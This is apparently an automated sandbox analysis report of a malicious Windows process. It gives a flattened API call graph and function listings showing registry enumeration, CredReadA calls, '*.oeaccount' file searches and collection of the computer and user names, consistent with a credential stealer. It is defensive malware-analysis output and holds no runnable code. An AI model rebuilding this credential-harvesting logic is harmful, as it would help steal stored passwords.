410dbb 33469->33596 33472 401ec2 33626 4070e3 strlen _mbscat _mbscpy _mbscat 33472->33626 33473 401ed4 33611 406f81 GetFileAttributesA 33473->33611 33476 401ee6 strlen strlen 33478 401f15 33476->33478 33479 401f28 33476->33479 33627 4070e3 strlen _mbscat _mbscpy _mbscat 33478->33627 33612 406f81 GetFileAttributesA 33479->33612 33482 401f35 33613 401c31 33482->33613 33485 401f75 33625 410a9c RegOpenKeyExA 33485->33625 33486 401c31 7 API calls 33486->33485 33488 401f91 33489 402187 33488->33489 33490 401f9c memset 33488->33490 33492 402195 ExpandEnvironmentStringsA 33489->33492 33493 4021a8 _strcmpi 33489->33493 33628 410b62 RegEnumKeyExA 33490->33628 33637 406f81 GetFileAttributesA 33492->33637 33493->33383 33493->33384 33495 40217e RegCloseKey 33495->33489 33496 401fd9 atoi 33497 401fef memset memset sprintf 33496->33497 33504 401fc9 33496->33504 33629 410b1e 33497->33629 33500 402165 33500->33495 33501 402076 memset memset strlen strlen 33501->33504 33502 4070e3 strlen _mbscat _mbscpy _mbscat 33502->33504 33503 4020dd strlen strlen 33503->33504 33504->33495 33504->33496 33504->33500 33504->33501 33504->33502 33504->33503 33505 406f81 GetFileAttributesA 33504->33505 33506 402167 _mbscpy 33504->33506 33636 410b62 RegEnumKeyExA 33504->33636 33505->33504 33506->33495 33508 40c422 33507->33508 33509 40c425 _mbscat _mbscpy _mbscpy 33507->33509 33508->33509 33510 40c49d 33509->33510 33511 40c512 33510->33511 33512 40c502 GetWindowPlacement 33510->33512 33513 40c538 33511->33513 33658 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33511->33658 33512->33511 33651 409b31 33513->33651 33517 40ba28 33518 40ba87 33517->33518 33522 40ba3c 33517->33522 33661 406c62 LoadCursorA SetCursor 33518->33661 33520 40ba8c 33662 4107f1 33520->33662 33665 410a9c RegOpenKeyExA 33520->33665 33666 404734 33520->33666 33674 404785 33520->33674 33677 403c16 33520->33677 33521 40ba43 _mbsicmp 33521->33522 33522->33518 33522->33521 33753 40b5e5 10 API calls 33522->33753 33523 40baa0 33524 407e30 _strcmpi 33523->33524 33527 40bab0 33524->33527 33525 40bafa SetCursor 33525->33390 33527->33525 33528 40baf1 qsort 33527->33528 33528->33525 34113 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33534->34113 33536 40b00e 33537 40b016 33536->33537 33538 40b01f GetStdHandle 33536->33538 34114 406d1a CreateFileA 33537->34114 33540 40b01c 33538->33540 33541 40b035 33540->33541 33542 40b12d 33540->33542 34115 406c62 LoadCursorA SetCursor 33541->34115 34119 406d77 9 API calls 33542->34119 33545 40b136 33556 40c580 28 API calls 33545->33556 33546 40b042 33547 40b087 33546->33547 33553 40b0a1 33546->33553 34116 40a57c strlen WriteFile 33546->34116 33547->33553 34117 40a699 12 API calls 33547->34117 33550 40b0d6 33551 40b116 CloseHandle 33550->33551 33552 40b11f SetCursor 33550->33552 33551->33552 33552->33545 33553->33550 34118 406d77 9 API calls 33553->34118 33555->33384 33556->33387 33569 409a32 33557->33569 33560 409c80 memcpy memcpy 33561 409cda 33560->33561 33561->33560 33562 408db6 12 API calls 33561->33562 33563 409d18 ??2@YAPAXI ??2@YAPAXI 33561->33563 33562->33561 33564 409d54 ??2@YAPAXI 33563->33564 33565 409d8b 33563->33565 33564->33565 33579 409b9c 33565->33579 33568 4023c1 33568->33469 33570 409a44 33569->33570 33571 409a3d ??3@YAXPAX 33569->33571 33572 409a52 33570->33572 33573 409a4b ??3@YAXPAX 33570->33573 33571->33570 33574 409a5c ??3@YAXPAX 33572->33574 33576 409a63 33572->33576 33573->33572 33574->33576 33575 409a83 ??2@YAPAXI ??2@YAPAXI 33575->33560 33576->33575 33577 409a73 ??3@YAXPAX 33576->33577 33578 409a7c ??3@YAXPAX 33576->33578 33577->33578 33578->33575 33580 407a55 ??3@YAXPAX 33579->33580 33581 409ba5 33580->33581 33582 407a55 ??3@YAXPAX 33581->33582 33583 409bad 33582->33583 33584 407a55 ??3@YAXPAX 33583->33584 33585 409bb5 33584->33585 33586 407a55 ??3@YAXPAX 33585->33586 33587 409bbd 33586->33587 33588 407a1f 4 API calls 33587->33588 33589 409bd0 33588->33589 33590 407a1f 4 API calls 33589->33590 33591 409bda 33590->33591 33592 407a1f 4 API calls 33591->33592 33593 409be4 33592->33593 33594 407a1f 4 API calls 33593->33594 33595 409bee 33594->33595 33595->33568 33597 410d0e 2 API calls 33596->33597 33598 410dca 33597->33598 33599 410dfd memset 33598->33599 33638 4070ae 33598->33638 33600 410e1d 33599->33600 33641 410a9c RegOpenKeyExA 33600->33641 33604 410e4a 33605 410e7f _mbscpy 33604->33605 33642 410d3d _mbscpy 33604->33642 33606 401e9e strlen strlen 33605->33606 33606->33472 33606->33473 33608 410e5b 33643 410add RegQueryValueExA 33608->33643 33610 410e73 RegCloseKey 33610->33605 33611->33476 33612->33482 33644 410a9c RegOpenKeyExA 33613->33644 33615 401c4c 33616 401cad 33615->33616 33645 410add RegQueryValueExA 33615->33645 33616->33485 33616->33486 33618 401c6a 33619 401c71 strchr 33618->33619 33620 401ca4 RegCloseKey 33618->33620 33619->33620 33621 401c85 strchr 33619->33621 33620->33616 33621->33620 33622 401c94 33621->33622 33646 406f06 strlen 33622->33646 33624 401ca1 33624->33620 33625->33488 33626->33473 33627->33479 33628->33504 33649 410a9c RegOpenKeyExA 33629->33649 33631 410b34 33632 410b5d 33631->33632 33650 410add RegQueryValueExA 33631->33650 33632->33504 33634 410b4c RegCloseKey 33634->33632 33636->33504 33637->33493 33639 4070bd GetVersionExA 33638->33639 33640 4070ce 33638->33640 33639->33640 33640->33599 33640->33606 33641->33604 33642->33608 33643->33610 33644->33615 33645->33618 33647 406f17 33646->33647 33648 406f1a memcpy 33646->33648 33647->33648 33648->33624 33649->33631 33650->33634 33652 409b40 33651->33652 33654 409b4e 33651->33654 33659 409901 memset SendMessageA 33652->33659 33655 409b99 33654->33655 33656 409b8b 33654->33656 33655->33517 33660 409868 SendMessageA 33656->33660 33658->33513 33659->33654 33660->33655 33661->33520 33663 410807 33662->33663 33664 4107fc FreeLibrary 33662->33664 33663->33523 33664->33663 33665->33523 33667 404785 FreeLibrary 33666->33667 33668 40473b LoadLibraryA 33667->33668 33669 40474c GetProcAddress 33668->33669 33672 40476e 33668->33672 33670 404764 33669->33670 33669->33672 33670->33672 33671 404781 33671->33523 33672->33671 33673 404785 FreeLibrary 33672->33673 33673->33671 33675 4047a3 33674->33675 33676 404799 FreeLibrary 33674->33676 33675->33523 33676->33675 33678 4107f1 FreeLibrary 33677->33678 33679 403c30 LoadLibraryA 33678->33679 33680 403c74 33679->33680 33681 403c44 GetProcAddress 33679->33681 33683 4107f1 FreeLibrary 33680->33683 33681->33680 33682 403c5e 33681->33682 33682->33680 33687 403c6b 33682->33687 33684 403c7b 33683->33684 33685 404734 3 API calls 33684->33685 33686 403c86 33685->33686 33754 4036e5 33686->33754 33687->33684 33690 4036e5 23 API calls 33691 403c9a 33690->33691 33692 4036e5 23 API calls 33691->33692 33693 403ca4 33692->33693 33694 4036e5 23 API calls 33693->33694 33695 403cae 33694->33695 33764 4085d2 33695->33764 33703 403cf7 33810 410a9c RegOpenKeyExA 33703->33810 33704 403ce5 33704->33703 33945 402bd1 39 API calls 33704->33945 33707 403d0a 33708 403d1c 33707->33708 33946 402bd1 39 API calls 33707->33946 33811 402c5d 33708->33811 33712 4070ae GetVersionExA 33713 403d31 33712->33713 33829 410a9c RegOpenKeyExA 33713->33829 33715 403d51 33716 403d61 33715->33716 33947 402b22 46 API calls 33715->33947 33830 410a9c RegOpenKeyExA 33716->33830 33719 403d87 33720 403d97 33719->33720 33948 402b22 46 API calls 33719->33948 33831 410a9c RegOpenKeyExA 33720->33831 33723 403dbd 33724 403dcd 33723->33724 33949 402b22 46 API calls 33723->33949 33832 410808 33724->33832 33728 404785 FreeLibrary 33729 403de8 33728->33729 33836 402fdb 33729->33836 33732 402fdb 34 API calls 33733 403e00 33732->33733 33852 4032b7 33733->33852 33742 403e3b 33744 403e73 33742->33744 33745 403e46 _mbscpy 33742->33745 33899 40fb00 33744->33899 33951 40f334 334 API calls 33745->33951 33753->33522 33755 4037c5 33754->33755 33756 4036fb 33754->33756 33755->33690 33756->33755 33757 403716 strchr 33756->33757 33757->33755 33758 403730 33757->33758 33952 4021b6 memset 33758->33952 33760 40373f _mbscpy _mbscpy strlen 33761 4037a4 _mbscpy 33760->33761 33762 403789 sprintf 33760->33762 33953 4023e5 16 API calls 33761->33953 33762->33761 33765 4085e2 33764->33765 33954 4082cd 11 API calls 33765->33954 33769 408600 33770 403cba 33769->33770 33771 40860b memset 33769->33771 33782 40821d 33770->33782 33957 410b62 RegEnumKeyExA 33771->33957 33773 4086d2 RegCloseKey 33773->33770 33775 408637 33775->33773 33776 40865c memset 33775->33776 33958 410a9c RegOpenKeyExA 33775->33958 33961 410b62 RegEnumKeyExA 33775->33961 33959 410add RegQueryValueExA 33776->33959 33779 408694 33960 40848b 10 API calls 33779->33960 33781 4086ab RegCloseKey 33781->33775 33962 410a9c RegOpenKeyExA 33782->33962 33784 40823f 33785 403cc6 33784->33785 33786 408246 memset 33784->33786 33794 4086e0 33785->33794 33963 410b62 RegEnumKeyExA 33786->33963 33788 4082bf RegCloseKey 33788->33785 33790 40826f 33790->33788 33964 410a9c RegOpenKeyExA 33790->33964 33965 4080ed 11 API calls 33790->33965 33966 410b62 RegEnumKeyExA 33790->33966 33793 4082a2 RegCloseKey 33793->33790 33967 4045db 33794->33967 33796 4088ef 33975 404656 33796->33975 33800 408737 wcslen 33800->33796 33806 40876a 33800->33806 33801 40877a _wcsncoll 33801->33806 33803 404734 3 API calls 33803->33806 33804 404785 FreeLibrary 33804->33806 33805 408812 memset 33805->33806 33807 40883c memcpy wcschr 33805->33807 33806->33796 33806->33801 33806->33803 33806->33804 33806->33805 33806->33807 33808 4088c3 LocalFree 33806->33808 33978 40466b _mbscpy 33806->33978 33807->33806 33808->33806 33809 410a9c RegOpenKeyExA 33809->33704 33810->33707 33979 410a9c RegOpenKeyExA 33811->33979 33813 402c7a 33814 402da5 33813->33814 33815 402c87 memset 33813->33815 33814->33712 33980 410b62 RegEnumKeyExA 33815->33980 33817 402d9c RegCloseKey 33817->33814 33818 410b1e 3 API calls 33819 402ce4 memset sprintf 33818->33819 33981 410a9c RegOpenKeyExA 33819->33981 33821 402d28 33822 402d3a sprintf 33821->33822 33982 402bd1 39 API calls 33821->33982 33983 410a9c RegOpenKeyExA 33822->33983 33827 402cb2 33827->33817 33827->33818 33828 402d9a 33827->33828 33984 402bd1 39 API calls 33827->33984 33985 410b62 RegEnumKeyExA 33827->33985 33828->33817 33829->33715 33830->33719 33831->33723 33833 410816 33832->33833 33834 4107f1 FreeLibrary 33833->33834 33835 403ddd 33834->33835 33835->33728 33986 410a9c RegOpenKeyExA 33836->33986 33838 402ff9 33839 403006 memset 33838->33839 33840 40312c 33838->33840 33987 410b62 RegEnumKeyExA 33839->33987 33840->33732 33842 403122 RegCloseKey 33842->33840 33843 410b1e 3 API calls 33844 403058 memset sprintf 33843->33844 33988 410a9c RegOpenKeyExA 33844->33988 33846 4030a2 memset 33989 410b62 RegEnumKeyExA 33846->33989 33848 410b62 RegEnumKeyExA 33851 403033 33848->33851 33849 4030f9 RegCloseKey 33849->33851 33851->33842 33851->33843 33851->33846 33851->33848 33851->33849 33990 402db3 26 API calls 33851->33990 33853 4032d5 33852->33853 33854 4033a9 33852->33854 33991 4021b6 memset 33853->33991 33867 4034e4 memset memset 33854->33867 33856 4032e1 33992 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33856->33992 33858 4032ea 33859 4032f8 memset GetPrivateProfileSectionA 33858->33859 33993 4023e5 16 API calls 33858->33993 33859->33854 33864 40332f 33859->33864 33861 40339b strlen 33861->33854 33861->33864 33863 403350 strchr 33863->33864 33864->33854 33864->33861 33994 4021b6 memset 33864->33994 33995 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33864->33995 33996 4023e5 16 API calls 33864->33996 33868 410b1e 3 API calls 33867->33868 33869 40353f 33868->33869 33870 40357f 33869->33870 33871 403546 _mbscpy 33869->33871 33875 403985 33870->33875 33997 406d55 strlen _mbscat 33871->33997 33873 403565 _mbscat 33998 4033f0 19 API calls 33873->33998 33999 40466b _mbscpy 33875->33999 33879 4039aa 33880 4039ff 33879->33880 34000 40f460 memset memset 33879->34000 34021 40f6e2 33879->34021 34039 4038e8 21 API calls 33879->34039 33882 404785 FreeLibrary 33880->33882 33883 403a0b 33882->33883 33884 4037ca memset memset 33883->33884 34047 444551 memset 33884->34047 33887 4038e2 33887->33742 33950 40f334 334 API calls 33887->33950 33889 40382e 33890 406f06 2 API calls 33889->33890 33891 403843 33890->33891 33892 406f06 2 API calls 33891->33892 33893 403855 strchr 33892->33893 33894 403884 _mbscpy 33893->33894 33895 403897 strlen 33893->33895 33896 4038bf _mbscpy 33894->33896 33895->33896 33897 4038a4 sprintf 33895->33897 34059 4023e5 16 API calls 33896->34059 33897->33896 33900 44b090 33899->33900 33901 40fb10 RegOpenKeyExA 33900->33901 33902 403e7f 33901->33902 33903 40fb3b RegOpenKeyExA 33901->33903 33913 40f96c 33902->33913 33904 40fb55 RegQueryValueExA 33903->33904 33905 40fc2d RegCloseKey 33903->33905 33906 40fc23 RegCloseKey 33904->33906 33907 40fb84 33904->33907 33905->33902 33906->33905 33908 404734 3 API calls 33907->33908 33909 40fb91 33908->33909 33909->33906 33910 40fc19 LocalFree 33909->33910 33911 40fbdd memcpy memcpy 33909->33911 33910->33906 34064 40f802 11 API calls 33911->34064 33914 4070ae GetVersionExA 33913->33914 33915 40f98d 33914->33915 33916 4045db 7 API calls 33915->33916 33917 40f9a9 33916->33917 33918 40fae6 33917->33918 33921 40fa13 memset WideCharToMultiByte 33917->33921 33919 404656 FreeLibrary 33918->33919 33920 403e85 33919->33920 33925 4442ea memset 33920->33925 33921->33917 33922 40fa43 _strnicmp 33921->33922 33922->33917 33923 40fa5b WideCharToMultiByte 33922->33923 33923->33917 33924 40fa88 WideCharToMultiByte 33923->33924 33924->33917 33926 410dbb 9 API calls 33925->33926 33927 444329 33926->33927 34065 40759e strlen strlen 33927->34065 33932 410dbb 9 API calls 33933 444350 33932->33933 33934 40759e 3 API calls 33933->33934 33935 44435a 33934->33935 33936 444212 65 API calls 33935->33936 33937 444366 memset memset 33936->33937 33938 410b1e 3 API calls 33937->33938 33939 4443b9 ExpandEnvironmentStringsA strlen 33938->33939 33940 4443f4 _strcmpi 33939->33940 33941 4443e5 33939->33941 33942 403e91 33940->33942 33943 44440c 33940->33943 33941->33940 33942->33523 33944 444212 65 API calls 33943->33944 33944->33942 33945->33703 33946->33708 33947->33716 33948->33720 33949->33724 33950->33742 33951->33744 33952->33760 33953->33755 33955 40841c 33954->33955 33956 410a9c RegOpenKeyExA 33955->33956 33956->33769 33957->33775 33958->33775 33959->33779 33960->33781 33961->33775 33962->33784 33963->33790 33964->33790 33965->33793 33966->33790 33968 404656 FreeLibrary 33967->33968 33969 4045e3 LoadLibraryA 33968->33969 33970 404651 33969->33970 33971 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33969->33971 33970->33796 33970->33800 33972 40463d 33971->33972 33973 404643 33972->33973 33974 404656 FreeLibrary 33972->33974 33973->33970 33974->33970 33976 403cd2 33975->33976 33977 40465c FreeLibrary 33975->33977 33976->33809 33977->33976 33978->33806 33979->33813 33980->33827 33981->33821 33982->33822 33983->33827 33984->33827 33985->33827 33986->33838 33987->33851 33988->33851 33989->33851 33990->33851 33991->33856 33992->33858 33993->33859 33994->33863 33995->33864 33996->33864 33997->33873 33998->33870 33999->33879 34040 4078ba 34000->34040 34003 4078ba _mbsnbcat 34004 40f5a3 RegOpenKeyExA 34003->34004 34005 40f5c3 RegQueryValueExA 34004->34005 34006 40f6d9 34004->34006 34007 40f6d0 RegCloseKey 34005->34007 34008 40f5f0 34005->34008 34006->33879 34007->34006 34008->34007 34009 40f675 34008->34009 34044 40466b _mbscpy 34008->34044 34009->34007 34045 4012ee strlen 34009->34045 34011 40f611 34013 404734 3 API calls 34011->34013 34018 40f616 34013->34018 34014 40f69e RegQueryValueExA 34014->34007 34015 40f6c1 34014->34015 34015->34007 34016 40f66a 34017 404785 FreeLibrary 34016->34017 34017->34009 34018->34016 34019 40f661 LocalFree 34018->34019 34020 40f645 memcpy 34018->34020 34019->34016 34020->34019 34046 40466b _mbscpy 34021->34046 34023 40f6fa 34024 4045db 7 API calls 34023->34024 34025 40f708 34024->34025 34026 404734 3 API calls 34025->34026 34033 40f7e2 34025->34033 34028 40f715 34026->34028 34027 404656 FreeLibrary 34029 40f7f1 34027->34029 34030 40f71d CredReadA 34028->34030 34028->34033 34031 404785 FreeLibrary 34029->34031 34030->34033 34034 40f734 34030->34034 34032 40f7fc 34031->34032 34032->33879 34033->34027 34034->34033 34035 40f797 WideCharToMultiByte 34034->34035 34036 40f7b8 strlen 34035->34036 34037 40f7d9 LocalFree 34035->34037 34036->34037 34038 40f7c8 _mbscpy 34036->34038 34037->34033 34038->34037 34039->33879 34041 4078e6 34040->34041 34042 4078c7 _mbsnbcat 34041->34042 34043 4078ea 34041->34043 34042->34041 34043->34003 34044->34011 34045->34014 34046->34023 34060 410a9c RegOpenKeyExA 34047->34060 34049 40381a 34049->33887 34058 4021b6 memset 34049->34058 34050 44458b 34050->34049 34061 410add RegQueryValueExA 34050->34061 34052 4445a4 34053 4445dc RegCloseKey 34052->34053 34062 410add RegQueryValueExA 34052->34062 34053->34049 34055 4445c1 34055->34053 34063 444879 30 API calls 34055->34063 34057 4445da 34057->34053 34058->33889 34059->33887 34060->34050 34061->34052 34062->34055 34063->34057 34064->33910 34066 4075c9 34065->34066 34067 4075bb _mbscat 34065->34067 34068 444212 34066->34068 34067->34066 34085 407e9d 34068->34085 34071 44424d 34072 444274 34071->34072 34073 444258 34071->34073 34093 407ef8 34071->34093 34074 407e9d 9 API calls 34072->34074 34110 444196 52 API calls 34073->34110 34081 4442a0 34074->34081 34076 407ef8 9 API calls 34076->34081 34077 4442ce 34107 407f90 34077->34107 34081->34076 34081->34077 34083 444212 65 API calls 34081->34083 34103 407e62 34081->34103 34082 407f90 FindClose 34084 4442e4 34082->34084 34083->34081 34084->33932 34086 407f90 FindClose 34085->34086 34087 407eaa 34086->34087 34088 406f06 2 API calls 34087->34088 34089 407ebd strlen strlen 34088->34089 34090 407ee1 34089->34090 34091 407eea 34089->34091 34111 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34111 34091->34071 34094 407f03 FindFirstFileA 34093->34094 34095 407f24 FindNextFileA 34093->34095 34096 407f3f 34094->34096 34097 407f46 strlen strlen 34095->34097 34098 407f3a 34095->34098 34096->34097 34101 407f7f 34096->34101 34099 407f76 34097->34099 34097->34101 34100 407f90 FindClose 34098->34100 34112 4070e3 strlen _mbscat _mbscpy _mbscat 34099->34112 34100->34096 34101->34071 34104 407e94 34103->34104 34105 407e6c strcmp 34103->34105 34104->34081 34105->34104 34106 407e83 strcmp 34105->34106 34106->34104 34108 407fa3 34107->34108 34109 407f99 FindClose 34107->34109 34108->34082 34109->34108 34110->34071 34111->34091 34112->34101 34113->33536 34114->33540 34115->33546 34116->33547 34117->33553 34118->33550 34119->33545 34128 411853 RtlInitializeCriticalSection memset 34129 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34303 40a256 13 API calls 34305 432e5b 17 API calls 34307 43fa5a 20 API calls 34131 401060 41 API calls 34310 427260 CloseHandle memset memset 33210 410c68 FindResourceA 33211 410c81 SizeofResource 33210->33211 33212 410cae 33210->33212 33211->33212 33213 410c92 LoadResource 33211->33213 33213->33212 33214 410ca0 LockResource 33213->33214 33214->33212 34312 405e69 14 API calls 34136 433068 15 API calls __fprintf_l 34314 414a6d 18 API calls 34315 43fe6f 134 API calls 34138 424c6d 15 API calls __fprintf_l 34316 426741 19 API calls 34140 440c70 17 API calls 34141 443c71 44 API calls 34144 427c79 24 API calls 34319 416e7e memset __fprintf_l 34148 42800b 47 API calls 34149 425115 85 API calls __fprintf_l 34322 41960c 61 API calls 34150 43f40c 122 API calls __fprintf_l 34153 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34154 43f81a 20 API calls 34156 414c20 memset memset 34157 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34326 414625 18 API calls 34327 404225 modf 34328 403a26 strlen WriteFile 34330 40422a 12 API calls 34334 427632 memset memset memcpy 34335 40ca30 59 API calls 34336 404235 26 API calls 34158 42ec34 61 API calls __fprintf_l 34159 425115 76 API calls __fprintf_l 34337 425115 77 API calls __fprintf_l 34339 44223a 38 API calls 34165 43183c 112 API calls 34340 44b2c5 _onexit __dllonexit 34345 42a6d2 memcpy __allrem 34167 405cda 65 API calls 34353 43fedc 138 API calls 34354 4116e1 16 API calls __fprintf_l 34170 4244e6 19 API calls 34172 42e8e8 127 API calls __fprintf_l 34173 4118ee RtlLeaveCriticalSection 34359 43f6ec 22 API calls 34175 425115 119 API calls __fprintf_l 33200 410cf3 EnumResourceNamesA 34362 4492f0 memcpy memcpy 34364 43fafa 18 API calls 34366 4342f9 15 API calls __fprintf_l 34176 4144fd 19 API calls 34368 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34369 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34372 443a84 _mbscpy 34374 43f681 17 API calls 34179 404487 22 API calls 34376 415e8c 16 API calls __fprintf_l 34183 411893 RtlDeleteCriticalSection __fprintf_l 34184 41a492 42 API calls 34380 403e96 34 API calls 34381 410e98 memset SHGetPathFromIDList SendMessageA 34186 426741 109 API calls __fprintf_l 34187 4344a2 18 API calls 34188 4094a2 10 API calls 34190 4108a4 memcpy UuidFromStringA UuidFromStringA UuidFromStringA memcpy 34384 4116a6 15 API calls __fprintf_l 34385 43f6a4 17 API calls 34386 440aa3 20 API calls 34388 427430 45 API calls 34192 4090b0 7 API calls 34193 4148b0 15 API calls 34195 4118b4 RtlEnterCriticalSection 34196 4014b7 CreateWindowExA 34197 40c8b8 19 API calls 34199 4118bf RtlTryEnterCriticalSection 34393 42434a 18 API calls __fprintf_l 34395 405f53 12 API calls 34207 43f956 59 API calls 34209 40955a 17 API calls 34210 428561 36 API calls 34211 409164 7 API calls 34399 404366 19 API calls 34403 40176c ExitProcess 34406 410777 42 API calls 34216 40dd7b 51 API calls 34217 425d7c 16 API calls __fprintf_l 34408 43f6f0 25 API calls 34409 42db01 22 API calls 34218 412905 15 API calls __fprintf_l 34410 403b04 54 API calls 34411 405f04 SetDlgItemTextA GetDlgItemTextA 34412 44b301 ??3@YAXPAX 34415 4120ea 14 API calls 3 library calls 34416 40bb0a 8 API calls 34418 413f11 strcmp 34222 434110 17 API calls __fprintf_l 34225 425115 108 API calls __fprintf_l 34419 444b11 _onexit 34227 425115 76 API calls __fprintf_l 34230 429d19 10 API calls 34422 444b1f __dllonexit 34423 409f20 _strcmpi 34232 42b927 31 API calls 34426 433f26 19 API calls __fprintf_l 34427 44b323 FreeLibrary 34428 427f25 46 API calls 34429 43ff2b 17 API calls 34430 43fb30 19 API calls 34239 414d36 16 API calls 34241 40ad38 7 API calls 34432 433b38 16 API calls __fprintf_l 34433 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34245 426741 21 API calls 34246 40c5c3 125 API calls 34248 43fdc5 17 API calls 34434 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34251 4161cb memcpy memcpy memcpy memcpy 33215 44b3cf 33216 44b3e6 33215->33216 33218 44b454 33215->33218 33216->33218 33222 44b40e 33216->33222 33219 44b405 33219->33218 33220 44b435 VirtualProtect 33219->33220 33220->33218 33221 44b444 VirtualProtect 33220->33221 33221->33218 33223 44b413 33222->33223 33225 44b454 33223->33225 33229 44b42b 33223->33229 33226 44b41c 33226->33225 33227 44b435 VirtualProtect 33226->33227 33227->33225 33228 44b444 VirtualProtect 33227->33228 33228->33225 33230 44b431 33229->33230 33231 44b435 VirtualProtect 33230->33231 33233 44b454 33230->33233 33232 44b444 VirtualProtect 33231->33232 33231->33233 33232->33233 34439 43ffc8 18 API calls 34252 4281cc 15 API calls __fprintf_l 34441 4383cc 110 API calls __fprintf_l 34253 4275d3 41 API calls 34442 4153d3 22 API calls __fprintf_l 34254 444dd7 _XcptFilter 34447 4013de 15 API calls 34449 425115 111 API calls __fprintf_l 34450 43f7db 18 API calls 34453 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34256 4335ee 16 API calls __fprintf_l 34455 429fef 11 API calls 34257 444deb _exit _c_exit 34456 40bbf0 138 API calls 34260 425115 79 API calls __fprintf_l 34460 437ffa 22 API calls 34264 4021ff 14 API calls 34265 43f5fc 149 API calls 34461 40e381 9 API calls 34267 405983 40 API calls 34268 42b186 27 API calls __fprintf_l 34269 427d86 76 API calls 34270 403585 20 API calls 34272 42e58e 18 API calls __fprintf_l 34275 425115 75 API calls __fprintf_l 34277 401592 8 API calls 33201 410b92 33204 410a6b 33201->33204 33203 410bb2 33205 410a77 33204->33205 33206 410a89 GetPrivateProfileIntA 33204->33206 33209 410983 memset _itoa WritePrivateProfileStringA 33205->33209 33206->33203 33208 410a84 33208->33203 33209->33208 34465 434395 16 API calls 34279 441d9c memcmp 34467 43f79b 119 API calls 34280 40c599 43 API calls 34468 426741 87 API calls 34284 4401a6 21 API calls 34286 426da6 memcpy memset memset memcpy 34287 4335a5 15 API calls 34289 4299ab memset memset memcpy memset memset 34290 40b1ab 8 API calls 34473 425115 76 API calls __fprintf_l 34477 4113b2 18 API calls 2 library calls 34481 40a3b8 memset sprintf SendMessageA 33234 410bbc 33237 4109cf 33234->33237 33238 4109dc 33237->33238 33239 410a23 memset GetPrivateProfileStringA 33238->33239 33240 4109ea memset 33238->33240 33245 407646 strlen 33239->33245 33250 4075cd sprintf memcpy 33240->33250 33243 410a0c WritePrivateProfileStringA 33244 410a65 33243->33244 33246 40765a 33245->33246 33248 40765c 33245->33248 33246->33244 33247 4076a3 33247->33244 33248->33247 33251 40737c strtoul 33248->33251 33250->33243 33251->33248 34292 40b5bf memset memset _mbsicmp

                    Executed Functions

                    Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                    APIs
                    • memset.MSVCRT ref: 0040832F
                    • memset.MSVCRT ref: 00408343
                    • memset.MSVCRT ref: 0040835F
                    • memset.MSVCRT ref: 00408376
                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                    • strlen.MSVCRT ref: 004083E9
                    • strlen.MSVCRT ref: 004083F8
                    • memcpy.MSVCRT ref: 0040840A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                    • String ID: 5$H$O$b$i$}$}
                    • API String ID: 1832431107-3760989150
                    • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                    • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                    Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                    • strlen.MSVCRT ref: 00407F5C
                    • strlen.MSVCRT ref: 00407F64
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFindstrlen$FirstNext
                    • String ID: ACD
                    • API String ID: 379999529-620537770
                    • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                    • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
